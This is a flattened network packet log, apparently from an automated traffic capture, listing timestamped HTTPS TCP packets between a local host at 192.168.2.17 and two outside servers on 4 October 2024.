                                                                                                                              Oct 4, 2024 15:10:42.622173071 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.622195959 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.622457981 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.623742104 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.671405077 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.802402020 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.802432060 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.802450895 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.802539110 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.802562952 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.802612066 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.888706923 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.888736010 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.888853073 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.888875961 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.888922930 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.891290903 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.891313076 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.891396046 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.891403913 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.891448975 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.975208998 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.975236893 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.975303888 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.975327015 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.975343943 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.975366116 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.976187944 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.976206064 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.976263046 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.976272106 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.976321936 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.977475882 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.977497101 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.977531910 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.977577925 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.977582932 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.977648020 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.978271961 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.978290081 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.978342056 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:42.978348017 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.978399992 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.062549114 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.062577963 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.062803984 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.062817097 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.062863111 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.063215971 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.063235998 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.063292027 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.063298941 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.063327074 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.063352108 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064023972 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064048052 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064093113 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064100027 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064138889 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064158916 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064806938 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064829111 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064892054 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064898014 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.064919949 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.064944983 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065067053 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065083027 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065131903 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065140009 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065165997 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065186024 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065865993 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065886974 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065936089 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065942049 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.065979004 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.065999031 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.066757917 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.066778898 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.067172050 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.067178965 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.067224026 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.098113060 CEST49710443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:10:43.098157883 CEST4434971020.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.098349094 CEST49710443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:10:43.099490881 CEST49710443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:10:43.099508047 CEST4434971020.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.112534046 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.112565041 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.112634897 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.112647057 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.112713099 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.150849104 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.150876045 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151000977 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151032925 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151081085 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151094913 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151113987 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151154041 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151165962 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151185036 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151216030 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151587009 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151603937 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151667118 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.151681900 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.151725054 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156156063 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156179905 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156270981 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156294107 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156333923 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156610012 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156626940 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156662941 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156682014 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156702042 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156718016 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156793118 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156814098 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156851053 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156862020 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.156883955 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.156904936 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.157017946 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.157037973 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.157071114 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.157078028 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.157104969 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.157120943 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.200644016 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.200673103 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.200795889 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.200815916 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.200860977 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.237922907 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.237951994 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238049030 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238070011 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238121033 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238291025 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238310099 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238368988 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238379955 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238432884 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238432884 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238658905 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238677025 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238733053 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238744974 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238794088 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238820076 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238841057 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238873959 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238882065 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.238908052 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.238928080 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.239537954 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239554882 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239615917 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.239638090 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239686966 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.239814043 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239834070 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239881992 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.239892006 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.239931107 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.240541935 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.240567923 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.240618944 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.240629911 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.240681887 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.288018942 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.288047075 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.288129091 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.288160086 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.288224936 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.325926065 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.325952053 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.326009035 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.326026917 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.326056957 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.326075077 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327476025 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327497005 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327554941 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327560902 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327574968 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327593088 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327614069 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327621937 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327644110 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327646971 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327666044 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327668905 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327682018 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327701092 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327733040 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327738047 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327754021 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327771902 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327794075 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327800989 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327811003 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327825069 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327832937 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327848911 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327853918 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327889919 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327912092 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327920914 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.327928066 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.327969074 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.328021049 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.375490904 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.375519037 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.375585079 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.375612974 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.375636101 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.375659943 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.413548946 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.413574934 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.413670063 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.413700104 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.413743973 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.414230108 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414249897 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414309025 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.414316893 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414360046 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.414530039 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414546013 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414608002 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.414617062 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414653063 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.414980888 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.414998055 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415055037 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415064096 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415091038 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415113926 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415256977 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415275097 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415332079 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415338039 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415373087 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415399075 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415817022 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415839911 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415878057 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415884972 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415910959 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415911913 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415930033 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.415936947 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415950060 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.415968895 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.416007042 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.466489077 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.466510057 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.466589928 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.466618061 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.466650009 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.466675997 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.502561092 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.502590895 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.502655983 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.502677917 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.502707958 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.502726078 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.503053904 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.503071070 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.503129005 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.503135920 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.503180027 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504540920 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504558086 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504606009 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504612923 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504642010 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504659891 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504750013 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504769087 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504805088 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504812002 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504838943 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504856110 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.504946947 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.504964113 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.505002022 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.505008936 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.505033016 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.505073071 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.505096912 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.505099058 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.505110025 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.505141020 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.505167961 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.506088018 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.506107092 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.506150007 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.506155968 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:43.506176949 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:43.506215096 CEST49709443192.168.2.1713.107.246.60
